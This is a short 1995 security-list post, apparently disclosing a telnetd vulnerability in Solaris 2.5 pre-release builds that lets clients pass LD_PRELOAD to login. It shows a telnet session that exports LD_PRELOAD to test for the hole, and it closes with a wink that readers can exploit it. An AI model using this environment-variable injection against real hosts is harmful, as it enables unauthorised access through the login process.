Date: Thu, 2 Nov 1995 20:38:38 -0500 (EST)


Anyone running almost any alpha/beta version of Solaris 2.5
is vulnerable to this telnet hole.

Solaris 2.4 and earlier Sun telnetds (including SunOS 4.x) did
not pass environment variables other than $TERM.

For Suns, the easiest way to check is this (using a modern telnet client):

% telnet
telnet> env define LD_PRELOAD /no-such-file
telnet> env export LD_PRELOAD
telnet> open host
Trying A.B.C.D...
Connected to host.
Escape character is '^]'.


UNIX(r) System V Release 4.0 (host)

ld.so.1: login: fatal: /no-such-file: can't open file: errno=2
Connection closed by foreign host.



        If you catch the /no-such-file hint, I'm sure you'll be able
to use this to your advantage... :)